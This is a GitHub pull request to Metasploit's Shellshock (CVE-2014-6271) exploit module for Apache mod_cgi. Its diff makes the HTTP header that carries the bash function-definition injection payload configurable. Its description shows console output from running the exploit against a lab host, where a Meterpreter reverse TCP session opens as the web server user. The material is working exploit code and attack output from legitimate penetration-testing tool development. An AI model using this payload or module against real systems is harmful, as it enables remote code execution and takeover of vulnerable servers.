### PR TITLE
Add variable HTTP Header to the CVE-2014-6271 exploit module too

### DIFF
--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Description' => %q{
         This module exploits a code injection in specially crafted environment
         variables in Bash, specifically targeting Apache mod_cgi scripts through
-        the HTTP_USER_AGENT variable.
+        the HTTP_USER_AGENT variable by default.
       },
       'Author' => [
         'Stephane Chazelas', # Vulnerability discovery
@@ -58,7 +58,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'Path to CGI script']),
-      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
+      OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
+      OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
       OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
       OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
       OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
@@ -117,7 +118,9 @@ class Metasploit4 < Msf::Exploit::Remote
       {
         'method' => datastore['METHOD'],
         'uri' => normalize_uri(target_uri.path.to_s),
-        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+        'headers' => {
+          datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+        }
       }, datastore['TIMEOUT'])
   end
 


### PR DESCRIPTION
This adds the changes introduced by @wvu-r7 in PR #3902 to the exploit module.

Example output:

```
msf-git (S:0 J:0) exploit(apache_mod_cgi_bash_env_exec) > show options 

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting    Required  Description
   ----            ---------------    --------  -----------
   CMD_MAX_LENGTH  2048               yes       CMD max line length
   HEADER          User-Agent         yes       HTTP header to use
   METHOD          GET                yes       HTTP method to use
   Proxies                            no        Use a proxy chain
   RHOST           192.168.90.129     yes       The target address
   RPATH           /bin               yes       Target PATH for binaries used by the CmdStager
   RPORT           80                 yes       The target port
   TARGETURI       /cgi-bin/hello.pl  yes       Path to CGI script
   TIMEOUT         5                  yes       HTTP read response timeout (seconds)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         192.168.90.1     yes       The listen address
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf-git (S:0 J:0) exploit(apache_mod_cgi_bash_env_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.90.1:4444 
[*] Command Stager progress - 100.60% done (837/832 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.90.129
[*] Meterpreter session 2 opened (192.168.90.1:4444 -> 192.168.90.129:54694) at 2014-09-27 18:58:14 -0400

meterpreter > getuid
Server username: uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33
meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > 
```
